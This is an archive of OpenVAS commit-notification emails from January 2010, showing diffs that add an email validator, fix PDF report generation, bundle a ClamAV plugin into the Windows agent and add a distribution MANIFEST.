From scm-commit at wald.intevation.org Mon Jan 4 12:02:46 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 12:02:46 +0100 (CET) Subject: [Openvas-commits] r6296 - in trunk/gsa: . src src/html/src Message-ID: <20100104110246.228CE861F2C5@pyrosoma.intevation.org> Author: mattm Date: 2010-01-04 12:02:45 +0100 (Mon, 04 Jan 2010) New Revision: 6296 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/html/src/omp.xsl Log: * src/gsad.c (init_validator): Add email rule. (escalator_data): New function. (exec_omp_post): Check email addresses. * src/html/src/omp.xsl (html-create-escalator-form): Match email length to validator. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2009-12-31 17:15:05 UTC (rev 6295) +++ trunk/gsa/ChangeLog 2010-01-04 11:02:45 UTC (rev 6296) @@ -1,3 +1,12 @@ +2009-01-04 Matthew Mundell + + * src/gsad.c (init_validator): Add email rule. + (escalator_data): New function. + (exec_omp_post): Check email addresses. + + * src/html/src/omp.xsl (html-create-escalator-form): Match email length to + validator. + 2009-12-31 Matthew Mundell Add test escalator buttons to the escalators page. Add "From Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2009-12-31 17:15:05 UTC (rev 6295) +++ trunk/gsa/src/gsad.c 2010-01-04 11:02:45 UTC (rev 6296) @@ -208,6 +208,7 @@ openvas_validator_add (validator, "condition", "^[[:alnum:] ]{0,100}$"); openvas_validator_add (validator, "create_credentials_type", "^(gen|pass)$"); openvas_validator_add (validator, "credential_login", "^[[:alnum:]]{1,40}$"); + openvas_validator_add (validator, "email", "^[^@ ]{1,150}@[^@ ]{1,150}$"); openvas_validator_add (validator, "family", "^[-_[:alnum:] :]{1,200}$"); openvas_validator_add (validator, "first_result", "^[0-9]+$"); openvas_validator_add (validator, "format", "^(html)|(nbe)|(pdf)|(xml)$"); @@ -245,6 +246,28 @@ } /** + * @brief Get data for an escalator. + * + * @param[out] data Data. + * @param[out] name Name of element. + * + * @return 0 on success, -1 on error. + */ +static gchar * +escalator_data (GArray *data, const char *name) +{ + int index = 0; + gchar *element; + + if (data) + while ((element = g_array_index (data, gchar*, index++))) + if (strcmp (element, name) == 0) + return element + strlen (element) + 1; + + return 0; +} + +/** * @brief Connection information. * * These objects are used to hold connection information @@ -1307,6 +1330,28 @@ free (con_info->req_parms.method); con_info->req_parms.method = NULL; } + else if (strcasecmp (con_info->req_parms.method, "Email") == 0) + { + char *to_address; + to_address = escalator_data (con_info->req_parms.method_data, + "to_address"); + if (openvas_validate (validator, "email", to_address)) + { + free (con_info->req_parms.method); + con_info->req_parms.method = NULL; + } + else + { + gchar *from_address; + from_address = escalator_data (con_info->req_parms.method_data, + "from_address"); + if (openvas_validate (validator, "email", from_address)) + { + free (con_info->req_parms.method); + con_info->req_parms.method = NULL; + } + } + } con_info->response = create_escalator_omp (credentials, con_info->req_parms.name, con_info->req_parms.comment, Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2009-12-31 17:15:05 UTC (rev 6295) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-04 11:02:45 UTC (rev 6296) @@ -1818,14 +1818,14 @@ To Address - + From Address - + From scm-commit at wald.intevation.org Mon Jan 4 13:45:57 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 13:45:57 +0100 (CET) Subject: [Openvas-commits] r6297 - in trunk/openvas-manager: . src Message-ID: <20100104124557.4EAC2861F2E9@pyrosoma.intevation.org> Author: felix Date: 2010-01-04 13:45:54 +0100 (Mon, 04 Jan 2010) New Revision: 6297 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/omp.c Log: Fixed bug that could result in endless loops in pdf report generation. * src/omp.c (next_break): Corrected position of remembered last space character in input string. (latex_print_verbatim_text): Removed ampersand condition, as we are in verbatim environment. (print_report_latex): Removed done todo, minor style edit. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-04 11:02:45 UTC (rev 6296) +++ trunk/openvas-manager/ChangeLog 2010-01-04 12:45:54 UTC (rev 6297) @@ -1,3 +1,13 @@ +2010-01-04 Felix Wolfsteller + + Fixed bug that could result in endless loops in pdf report generation. + + * src/omp.c (next_break): Corrected position of remembered last space + character in input string. + (latex_print_verbatim_text): Removed ampersand condition, as we are in + verbatim environment. + (print_report_latex): Removed done todo, minor style edit. + 2009-12-31 Matthew Mundell Add OMP command TEST_ESCALATOR. Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-04 11:02:45 UTC (rev 6296) +++ trunk/openvas-manager/src/omp.c 2010-01-04 12:45:54 UTC (rev 6297) @@ -2923,7 +2923,7 @@ return nchars + 1; break; case ' ': - last_space = nchars; + last_space = nchars + 1; /*@fallthrough@*/ default: /* A normal character, that the caller would just write out. */ @@ -3036,10 +3036,6 @@ nchars++; pos++; break; - case '&': - /* Escape ampersand, as it separates columns within tabulars. */ - fputc ('\\', file); - /*@fallthrough@*/ default: /* A normal character, write it out. */ fputc (*pos, file); @@ -3243,11 +3239,6 @@ char *start_time, *end_time; /** - * @todo Lines of issue texts (descriptions of message like "security hole") - * are printed as rows. This will lead to trouble if a single issue line - * does not fit on a whole page, because page breaks can only be inserted - * _between_ rows. Consider using the verbatim environment with manually - * added row breaks after a certain number of characters. * @todo Also, this code produces empty tables (probably because of the * 'if (last_port == )' code). * @todo Escape all text that should appear as text in latex. @@ -3280,8 +3271,8 @@ free (start_time); free (end_time); - fputs("\\tableofcontents\n", out); - fputs("\\newpage\n", out); + fputs ("\\tableofcontents\n", out); + fputs ("\\newpage\n", out); /* Print the list of hosts. */ From scm-commit at wald.intevation.org Mon Jan 4 14:36:06 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 14:36:06 +0100 (CET) Subject: [Openvas-commits] r6298 - in trunk/winslad: . clamav Message-ID: <20100104133606.DA5E5861F2E9@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-04 14:34:54 +0100 (Mon, 04 Jan 2010) New Revision: 6298 Added: trunk/winslad/clamav/ trunk/winslad/clamav/Makefile trunk/winslad/clamav/README.txt trunk/winslad/clamav/clamav.h trunk/winslad/clamav/clamav.reg trunk/winslad/clamav/clamd.conf trunk/winslad/clamav/clamd.exe trunk/winslad/clamav/clamdscan.exe trunk/winslad/clamav/clamscan.exe trunk/winslad/clamav/daily.cld trunk/winslad/clamav/exeScanner.exe trunk/winslad/clamav/freshclam.conf trunk/winslad/clamav/freshclam.exe trunk/winslad/clamav/libclamav.dll trunk/winslad/clamav/libclamunrar.dll trunk/winslad/clamav/libclamunrar_iface.dll trunk/winslad/clamav/main.cvd trunk/winslad/clamav/mirrors.dat trunk/winslad/clamav/plugin.xml trunk/winslad/clamav/profiler.exe trunk/winslad/clamav/sigtool.exe Modified: trunk/winslad/ChangeLog trunk/winslad/Makefile trunk/winslad/winslad.nsi Log: Adding clamav plugin. * clamav/, clamav/Makefile, clamav/clamav.h, clamav/plugin.xml, clamav/README.txt, clamav/clamav.reg, clamav/daily.cld, clamav/clamd.conf, clamav/freshclam.conf, clamav/main.cvd, clamav/mirrors.dat, clamav/clamd.exe, clamav/clamdscan.exe, clamav/clamscan.exe, clamav/exeScanner.exe, clamav/freshclam.exe, clamav/profiler.exe, clamav/sigtool.exe, clamav/libclamav.dll, clamav/libclamunrar.dll, clamav/libclamunrar_iface.dll: New. * Makefile: Added handling of clamav directory. * winslad.nsi: Added handling of clamav directory. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/ChangeLog 2010-01-04 13:34:54 UTC (rev 6298) @@ -1,3 +1,19 @@ +2010-01-04 Michael Wiegand + + Adding clamav plugin. + + * clamav/, clamav/Makefile, clamav/clamav.h, clamav/plugin.xml, + clamav/README.txt, clamav/clamav.reg, clamav/daily.cld, + clamav/clamd.conf, clamav/freshclam.conf, clamav/main.cvd, + clamav/mirrors.dat, clamav/clamd.exe, clamav/clamdscan.exe, + clamav/clamscan.exe, clamav/exeScanner.exe, clamav/freshclam.exe, + clamav/profiler.exe, clamav/sigtool.exe, clamav/libclamav.dll, + clamav/libclamunrar.dll, clamav/libclamunrar_iface.dll: New. + + * Makefile: Added handling of clamav directory. + + * winslad.nsi: Added handling of clamav directory. + 2009-11-27 Michael Wiegand Post release version bump. Modified: trunk/winslad/Makefile =================================================================== --- trunk/winslad/Makefile 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/Makefile 2010-01-04 13:34:54 UTC (rev 6298) @@ -27,6 +27,7 @@ $(CP) $(EXE) $(PREFIX) $(MAKE) -C john $@ $(MAKE) -C oval $@ + $(MAKE) -C clamav $@ clean: $(RM) libexpat.a *~ *.o $(EXE) $(INSTALLER) nsis\nsis.log @@ -34,6 +35,7 @@ $(MAKE) -C testplugin $@ $(MAKE) -C john $@ $(MAKE) -C oval $@ + $(MAKE) -C clamav $@ # Generates basic code documentation (placed in doc/generated) doc : Added: trunk/winslad/clamav/Makefile =================================================================== --- trunk/winslad/clamav/Makefile 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/clamav/Makefile 2010-01-04 13:34:54 UTC (rev 6298) @@ -0,0 +1,14 @@ +# This is a GNU Makefile and part of Microsoft Windows SLAD +include ../config.mk +DIR=$(PLUGINDIR)\clamav + +all: + echo nothing to be done for all + +install: + -$(MKDIR) $(DIR) + $(XCOPY) *.* $(DIR) + $(RM) $(DIR)\Makefile + +clean: + $(RM) *~ Added: trunk/winslad/clamav/README.txt =================================================================== --- trunk/winslad/clamav/README.txt 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/clamav/README.txt 2010-01-04 13:34:54 UTC (rev 6298) @@ -0,0 +1,46 @@ +-- ClamAV native win32 port -- + +Copyright (c) 2005-2009 Gianluigi Tiesi + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU Library General Public +License as published by the Free Software Foundation; either +version 2 of the License, or (at your option) any later version. + +This library is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +Library General Public License for more details. +You should have received a copy of the GNU Library General Public +License along with this software; if not, write to the +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + +-- + +[features] + * [clamav] small footprint (all distribution is around 1.5 MiB) + * [clamav] nice icons ;) + * [clamav] support for unc paths, esotic/long file names + * [clamscan] memory scanner + * [libclamav] dynamic libclamav.dll library common for all executables + * [libclamav] support for 7zip archives + * [freshclam] native dns txt query on win98/ME / DnsAPI query on Win2k+ + * [clamd/freshclam] may also be used as Windows Services + +[notes] +* You can store database and config paths in the registry using + clamav.reg file (I may make a nsis installer in the future), + paths can be also REG_EXPAND_SZ, environment variables are + allowed here (i.e. you can use paths like %HomeDrive%\Clamav). + +* To use binaries compiled with Visual Studio 2005, + you need the msvcrt80 side by side assembly, the "simple way" is + uncompress Microsoft.VC80.CRT.zip in the directory of executables, + the directory Microsoft.VC80.CRT must be placed as is, putting + directly dlls in the same directory of the executable will not work. + On windows 9x you should put the dll and the manifest in windows + system directory without the Microsoft.VC80.CRT directory. + For more info about this refer to the relative msdn-page. + You can also download the redist package directly from Microsoft. + +- Please report bugs to sherpya at netfarm.it and not to bugs at clamav.net - Added: trunk/winslad/clamav/clamav.h =================================================================== --- trunk/winslad/clamav/clamav.h 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/clamav/clamav.h 2010-01-04 13:34:54 UTC (rev 6298) @@ -0,0 +1,218 @@ +/* + * Copyright (C) 2007-2009 Sourcefire, Inc. + * + * Authors: Tomasz Kojm + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 as + * published by the Free Software Foundation. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, + * MA 02110-1301, USA. + */ + +#ifndef __CLAMAV_H +#define __CLAMAV_H + +#include +#include + +#ifdef __cplusplus +extern "C" +{ +#endif + +#define CL_COUNT_PRECISION 4096 + +/* return codes */ +typedef enum { + /* libclamav specific */ + CL_CLEAN = 0, + CL_SUCCESS = 0, + CL_VIRUS, + CL_ENULLARG, + CL_EARG, + CL_EMALFDB, + CL_ECVD, + CL_EVERIFY, + CL_EUNPACK, + CL_EUSERABORT, + + /* I/O and memory errors */ + CL_EOPEN, + CL_ECREAT, + CL_EUNLINK, + CL_ESTAT, + CL_EREAD, + CL_ESEEK, + CL_EWRITE, + CL_EDUP, + CL_EACCES, + CL_ETMPFILE, + CL_ETMPDIR, + CL_EMAP, + CL_EMEM, + CL_ETIMEOUT, + + /* internal (not reported outside libclamav) */ + CL_BREAK, + CL_EMAXREC, + CL_EMAXSIZE, + CL_EMAXFILES, + CL_EFORMAT +} cl_error_t; + +/* db options */ +#define CL_DB_PHISHING 0x2 +#define CL_DB_PHISHING_URLS 0x8 +#define CL_DB_PUA 0x10 +#define CL_DB_CVDNOTMP 0x20 +#define CL_DB_OFFICIAL 0x40 /* internal */ +#define CL_DB_PUA_MODE 0x80 +#define CL_DB_PUA_INCLUDE 0x100 +#define CL_DB_PUA_EXCLUDE 0x200 +#define CL_DB_COMPILED 0x400 /* internal */ +#define CL_DB_DIRECTORY 0x800 /* internal */ + +/* recommended db settings */ +#define CL_DB_STDOPT (CL_DB_PHISHING | CL_DB_PHISHING_URLS) + +/* scan options */ +#define CL_SCAN_RAW 0x0 +#define CL_SCAN_ARCHIVE 0x1 +#define CL_SCAN_MAIL 0x2 +#define CL_SCAN_OLE2 0x4 +#define CL_SCAN_BLOCKENCRYPTED 0x8 +#define CL_SCAN_HTML 0x10 +#define CL_SCAN_PE 0x20 +#define CL_SCAN_BLOCKBROKEN 0x40 +#define CL_SCAN_MAILURL 0x80 +#define CL_SCAN_BLOCKMAX 0x100 /* ignored */ +#define CL_SCAN_ALGORITHMIC 0x200 +#define CL_SCAN_PHISHING_BLOCKSSL 0x800 /* ssl mismatches, not ssl by itself*/ +#define CL_SCAN_PHISHING_BLOCKCLOAK 0x1000 +#define CL_SCAN_ELF 0x2000 +#define CL_SCAN_PDF 0x4000 +#define CL_SCAN_STRUCTURED 0x8000 +#define CL_SCAN_STRUCTURED_SSN_NORMAL 0x10000 +#define CL_SCAN_STRUCTURED_SSN_STRIPPED 0x20000 +#define CL_SCAN_PARTIAL_MESSAGE 0x40000 +#define CL_SCAN_HEURISTIC_PRECEDENCE 0x80000 + +/* recommended scan settings */ +#define CL_SCAN_STDOPT (CL_SCAN_ARCHIVE | CL_SCAN_MAIL | CL_SCAN_OLE2 | CL_SCAN_PDF | CL_SCAN_HTML | CL_SCAN_PE | CL_SCAN_ALGORITHMIC | CL_SCAN_ELF) + +struct cl_engine; +struct cl_settings; + +#define CL_INIT_DEFAULT 0x0 +extern int cl_init(unsigned int initoptions); + +extern struct cl_engine *cl_engine_new(void); + +enum cl_engine_field { + CL_ENGINE_MAX_SCANSIZE, /* uint64_t */ + CL_ENGINE_MAX_FILESIZE, /* uint64_t */ + CL_ENGINE_MAX_RECURSION, /* uint32_t */ + CL_ENGINE_MAX_FILES, /* uint32_t */ + CL_ENGINE_MIN_CC_COUNT, /* uint32_t */ + CL_ENGINE_MIN_SSN_COUNT, /* uint32_t */ + CL_ENGINE_PUA_CATEGORIES, /* (char *) */ + CL_ENGINE_DB_OPTIONS, /* uint32_t */ + CL_ENGINE_DB_VERSION, /* uint32_t */ + CL_ENGINE_DB_TIME, /* time_t */ + CL_ENGINE_AC_ONLY, /* uint32_t */ + CL_ENGINE_AC_MINDEPTH, /* uint32_t */ + CL_ENGINE_AC_MAXDEPTH, /* uint32_t */ + CL_ENGINE_TMPDIR, /* (char *) */ + CL_ENGINE_KEEPTMP /* uint32_t */ +}; + +extern int cl_engine_set_num(struct cl_engine *engine, enum cl_engine_field field, long long num); + +extern long long cl_engine_get_num(const struct cl_engine *engine, enum cl_engine_field field, int *err); + +extern int cl_engine_set_str(struct cl_engine *engine, enum cl_engine_field field, const char *str); + +extern const char *cl_engine_get_str(const struct cl_engine *engine, enum cl_engine_field field, int *err); + +extern struct cl_settings *cl_engine_settings_copy(const struct cl_engine *engine); + +extern int cl_engine_settings_apply(struct cl_engine *engine, const struct cl_settings *settings); + +extern int cl_engine_settings_free(struct cl_settings *settings); + +extern int cl_engine_compile(struct cl_engine *engine); + +extern int cl_engine_addref(struct cl_engine *engine); + +extern int cl_engine_setcallback(struct cl_engine *engine, int (*callback)(int desc, int bytes)); + +extern int cl_engine_free(struct cl_engine *engine); + + +struct cl_stat { + char *dir; + struct stat *stattab; + char **statdname; + unsigned int entries; +}; + +struct cl_cvd { /* field no. */ + char *time; /* 2 */ + unsigned int version; /* 3 */ + unsigned int sigs; /* 4 */ + unsigned int fl; /* 5 */ + /* padding */ + char *md5; /* 6 */ + char *dsig; /* 7 */ + char *builder; /* 8 */ + unsigned int stime; /* 9 */ +}; + +/* file scanning */ +extern int cl_scandesc(int desc, const char **virname, unsigned long int *scanned, const struct cl_engine *engine, unsigned int scanoptions); + +extern int cl_scanfile(const char *filename, const char **virname, unsigned long int *scanned, const struct cl_engine *engine, unsigned int scanoptions); + +/* database handling */ +extern int cl_load(const char *path, struct cl_engine *engine, unsigned int *signo, unsigned int dboptions); +extern const char *cl_retdbdir(void); + +/* engine handling */ + +/* CVD */ +extern struct cl_cvd *cl_cvdhead(const char *file); +extern struct cl_cvd *cl_cvdparse(const char *head); +extern int cl_cvdverify(const char *file); +extern void cl_cvdfree(struct cl_cvd *cvd); + +/* db dir stat functions */ +extern int cl_statinidir(const char *dirname, struct cl_stat *dbstat); +extern int cl_statchkdir(const struct cl_stat *dbstat); +extern int cl_statfree(struct cl_stat *dbstat); + +/* enable debug messages */ +extern void cl_debug(void); + +/* software versions */ +extern unsigned int cl_retflevel(void); +extern const char *cl_retver(void); + +/* others */ +extern char *cli_gettempdir(void); +extern int cli_rmdirs(const char *dirname); +extern const char *cl_strerror(int clerror); + +#ifdef __cplusplus +} +#endif + +#endif /* __CLAMAV_H */ Added: trunk/winslad/clamav/clamav.reg =================================================================== --- trunk/winslad/clamav/clamav.reg 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/clamav/clamav.reg 2010-01-04 13:34:54 UTC (rev 6298) @@ -0,0 +1,6 @@ +REGEDIT4 + +[HKEY_LOCAL_MACHINE\SOFTWARE\ClamAV] +"ConfigDir"="C:\\Clamav" +"DataDir"="C:\\Clamav\\db" + Added: trunk/winslad/clamav/clamd.conf =================================================================== --- trunk/winslad/clamav/clamd.conf 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/clamav/clamd.conf 2010-01-04 13:34:54 UTC (rev 6298) @@ -0,0 +1,4 @@ +TCPSocket 3310 +MaxThreads 2 +LogFile c:\Clamav\clamd.log +DatabaseDirectory c:\clamav\db Added: trunk/winslad/clamav/clamd.exe =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/clamd.exe ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/clamdscan.exe =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/clamdscan.exe ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/clamscan.exe =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/clamscan.exe ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/daily.cld =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/daily.cld ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/exeScanner.exe =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/exeScanner.exe ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/freshclam.conf =================================================================== --- trunk/winslad/clamav/freshclam.conf 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/clamav/freshclam.conf 2010-01-04 13:34:54 UTC (rev 6298) @@ -0,0 +1,2 @@ +DatabaseMirror database.clamav.net +DNSDatabaseInfo current.cvd.clamav.net Added: trunk/winslad/clamav/freshclam.exe =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/freshclam.exe ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/libclamav.dll =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/libclamav.dll ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/libclamunrar.dll =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/libclamunrar.dll ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/libclamunrar_iface.dll =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/libclamunrar_iface.dll ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/main.cvd =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/main.cvd ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/mirrors.dat =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/mirrors.dat ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/plugin.xml =================================================================== --- trunk/winslad/clamav/plugin.xml 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/clamav/plugin.xml 2010-01-04 13:34:54 UTC (rev 6298) @@ -0,0 +1,35 @@ + + + + + Execute ClamAV to search for virus-infected files + + + Move infected files to quarantine + + clamscan.exe + -r --quiet --move=C:\winslad\quarant c:\ + + + + Remove infected files + + clamscan.exe + -r --quiet --remove c:\ + + + + Move infected files to quarantine exclude archives (.zip, .tgz, etc) + + bin/clamscan + -r --no-archive --quiet --move=c:\winslad\quarant c:\ + + + + Remove infected files exclude archives (.zip, .tgz, etc) + + clamscan.exe + -r --no-archive --quiet --remove c:\ + + + Added: trunk/winslad/clamav/profiler.exe =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/profiler.exe ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/winslad/clamav/sigtool.exe =================================================================== (Binary files differ) Property changes on: trunk/winslad/clamav/sigtool.exe ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Modified: trunk/winslad/winslad.nsi =================================================================== --- trunk/winslad/winslad.nsi 2010-01-04 12:45:54 UTC (rev 6297) +++ trunk/winslad/winslad.nsi 2010-01-04 13:34:54 UTC (rev 6298) @@ -42,6 +42,10 @@ SetOutPath $INSTDIR\plugins\oval file /r /x Makefile /x .svn oval\*.* + # clamav plugin + SetOutPath $INSTDIR\plugins\clamav + file /r /x Makefile /x .svn clamav\*.* + # after all plugins are installed, reset outpath again setOutPath $INSTDIR From scm-commit at wald.intevation.org Mon Jan 4 14:48:58 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 14:48:58 +0100 (CET) Subject: [Openvas-commits] r6299 - in trunk/openvas-manager: . src Message-ID: <20100104134858.CCE5C861F2C5@pyrosoma.intevation.org> Author: felix Date: 2010-01-04 14:48:57 +0100 (Mon, 04 Jan 2010) New Revision: 6299 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/omp.c Log: In PDF report, enabled page-breaks in result overview table. * src/omp.c (print_report_latex): Use longtable environment instead of tabularx environment when printing the result overview table. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-04 13:34:54 UTC (rev 6298) +++ trunk/openvas-manager/ChangeLog 2010-01-04 13:48:57 UTC (rev 6299) @@ -1,5 +1,12 @@ 2010-01-04 Felix Wolfsteller + In PDF report, enabled page-breaks in result overview table. + + * src/omp.c (print_report_latex): Use longtable environment instead of + tabularx environment when printing the result overview table. + +2010-01-04 Felix Wolfsteller + Fixed bug that could result in endless loops in pdf report generation. * src/omp.c (next_break): Corrected position of remembered last space Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-04 13:34:54 UTC (rev 6298) +++ trunk/openvas-manager/src/omp.c 2010-01-04 13:48:57 UTC (rev 6299) @@ -3276,13 +3276,23 @@ /* Print the list of hosts. */ - fprintf (out, - "\\section{Result Overview}\n" - "\n" - "\\begin{tabularx}{\\textwidth * 1}{|l|X|l|l|l|l|}\n" - "\\hline\n" - "\\rowcolor{openvas_report}" - "Host&Most Severe Result(s)&Holes&Warnings&Notes&False Positives\\\\\n"); + fprintf (out, "\\section{Result Overview}\n\n"); + fprintf (out, "\\begin{longtable}{|l|l|l|l|l|l|}\n"); + fprintf (out, "\\hline\n" + "\\rowcolor{openvas_report}" + "Host&Most Severe Result(s)&Holes&Warnings&Notes&False Positives\\\\\n" + "\\hline\n" + "\\endfirsthead\n" + "\\multicolumn{6}{l}{\\hfill\\ldots continued from previous page \\ldots}\\\\\n" + "\\hline\n" + "\\rowcolor{openvas_report}" + "Host&Most Severe Result(s)&Holes&Warnings&Notes&False Positives\\\\\n" + "\\endhead\n" + "\\hline\n" + "\\multicolumn{6}{l}{\\ldots continues on next page \\ldots}\\\\\n" + "\\endfoot\n" + "\\hline\n" + "\\endlastfoot\n"); init_host_iterator (&hosts, report); while (next (&hosts)) @@ -3325,7 +3335,7 @@ // FIX 0 (false positives) "Total: %i&&%i&%i&%i&0\\\\\n" "\\hline\n" - "\\end{tabularx}\n" + "\\end{longtable}\n" "\n" "\\section{Results per Host}\n" "\n", From scm-commit at wald.intevation.org Mon Jan 4 15:01:42 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 15:01:42 +0100 (CET) Subject: [Openvas-commits] r6300 - trunk/winslad Message-ID: <20100104140142.51B43861F2E9@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-04 15:01:41 +0100 (Mon, 04 Jan 2010) New Revision: 6300 Added: trunk/winslad/MANIFEST Modified: trunk/winslad/ChangeLog trunk/winslad/Makefile Log: Providing "make dist" infrastructure. * Makefile: Added "make dist" target. * MANIFEST: New. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-04 13:48:57 UTC (rev 6299) +++ trunk/winslad/ChangeLog 2010-01-04 14:01:41 UTC (rev 6300) @@ -1,5 +1,13 @@ 2010-01-04 Michael Wiegand + Providing "make dist" infrastructure. + + * Makefile: Added "make dist" target. + + * MANIFEST: New. + +2010-01-04 Michael Wiegand + Adding clamav plugin. * clamav/, clamav/Makefile, clamav/clamav.h, clamav/plugin.xml, Added: trunk/winslad/MANIFEST =================================================================== --- trunk/winslad/MANIFEST 2010-01-04 13:48:57 UTC (rev 6299) +++ trunk/winslad/MANIFEST 2010-01-04 14:01:41 UTC (rev 6300) @@ -0,0 +1,143 @@ +ChangeLog +CHANGES +clamav/clamav.h +clamav/clamav.reg +clamav/clamd.conf +clamav/clamd.exe +clamav/clamdscan.exe +clamav/clamscan.exe +clamav/daily.cld +clamav/exeScanner.exe +clamav/freshclam.conf +clamav/freshclam.exe +clamav/libclamav.dll +clamav/libclamunrar.dll +clamav/libclamunrar_iface.dll +clamav/main.cvd +clamav/Makefile +clamav/mirrors.dat +clamav/plugin.xml +clamav/profiler.exe +clamav/README.txt +clamav/sigtool.exe +client.cpp +config.h +config.mk +debug.h +doc/Doxyfile +doc/Doxyfile_full +expat/ascii.h +expat/asciitab.h +expat/COPYING +expat/expat_external.h +expat/expat.h +expat/iasciitab.h +expat/internal.h +expat/latin1tab.h +expat/Makefile +expat/nametab.h +expat/README +expat/utf8tab.h +expat/winconfig.h +expat/xmlparse.c +expat/xmlrole.c +expat/xmlrole.h +expat/xmltok.c +expat/xmltok.h +expat/xmltok_impl.c +expat/xmltok_impl.h +expat/xmltok_ns.c +foreach.hpp +gpl-2.0.txt +INSTALL.txt +john/all.chr +john/alnum.chr +john/alpha.chr +john/cygwin1.dll +john/digits.chr +john/iconv.exe +john/john.ini +john/john-mmx.exe +john/lanman.chr +john/libcharset1.dll +john/libiconv2.dll +john/libintl3.dll +john/Makefile +john/password.lst +john/plugin.xml +john/PwDump.exe +john/README.txt +john/runjohn.bat +main.cpp +Makefile +MANIFEST +nsis/Copssh_2.1.0_Installer.exe +nsis/profile +nsis/SpecialGroupsSIDs.nsh +nsis/sshd_config +nsis/UserMgr.dll +oval/Makefile +oval/ovaldi.exe +oval/pcre.dll +oval/plugin.xml +oval/README.txt +oval/runoval.bat +oval/terms.txt +oval/version.txt +oval/windows.xml +oval/Xalan-C_1_10.dll +oval/XalanMessages_1_10.dll +oval/xerces-c_2_7.dll +oval/xml/aix-definitions-schema.xsd +oval/xml/aix-system-characteristics-schema.xsd +oval/xml/apache-definitions-schema.xsd +oval/xml/apache-system-characteristics-schema.xsd +oval/xml/catos-definitions-schema.xsd +oval/xml/catos-system-characteristics-schema.xsd +oval/xml/esx-definitions-schema.xsd +oval/xml/esx-system-characteristics-schema.xsd +oval/xml/evaluation-ids.xsd +oval/xml/freebsd-definitions-schema.xsd +oval/xml/freebsd-system-characteristics-schema.xsd +oval/xml/hpux-definitions-schema.xsd +oval/xml/hpux-system-characteristics-schema.xsd +oval/xml/independent-definitions-schema.xsd 